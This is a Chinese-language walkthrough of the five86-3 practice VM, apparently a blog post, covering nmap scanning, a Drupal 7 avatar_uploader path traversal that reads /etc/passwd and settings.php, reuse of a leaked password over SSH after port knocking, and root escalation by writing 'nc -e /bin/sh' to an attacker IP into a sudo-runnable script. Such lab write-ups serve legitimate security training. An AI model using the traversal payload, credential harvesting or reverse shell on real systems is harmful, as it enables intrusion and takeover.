0
点赞
收藏
分享

微信扫一扫

five86-3靶机渗透攻略

下载连接:https://www.five86.com/five86-3.html

信息收集

nmap扫描

nmap -sS -sV 192.168.93.0/24
在这里插入图片描述

可知目标ip:192.168.93.133 只开放80

网站信息收集

cms为drupal7
在这里插入图片描述

drupal目录穿越漏洞利用

使用msf发现失败,利用方式不同与DC1
搜索cms漏洞利用方式
https://www.exploit-db.com

在这里插入图片描述
在这里插入图片描述

EXP为:http://example.com/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd

在这里插入图片描述

发现可登录 的用户为:steve、jan、sam、root

查看drupal7配置文件
/var/www/html/sites/default/settings.php
在这里插入图片描述

在这里插入图片描述

发现密码x4lB0XxX

现在知道用户:steve、jan、sam、root 密码:x4lB0XxX。但是没有登陆方式

ssh敲门

/etc/knockd.conf
在这里插入图片描述

需要15s内依次敲3个端口5004,4284,6872

knock -d 200 192.168.93.133 5004 4284 6872
在这里插入图片描述

在这里插入图片描述

端口看房状态维持60s,过后需要再敲
刚才几个用户只有sam能登上
在这里插入图片描述

提权

sudo -l
发现可执行root身份 /opt/scripts/restart-web.sh

在这里插入图片描述

发现sam对脚本有写权限
在这里插入图片描述

更改脚本
vi /opt/scripts/restart-web.sh
写入
nc -e /bin/sh 192.168.93.130 9999

在这里插入图片描述

kali监听端口
nc -lvvp 9999

执行脚本
在这里插入图片描述

提权成功,拿到flag!!
在这里插入图片描述

举报

相关推荐

0 条评论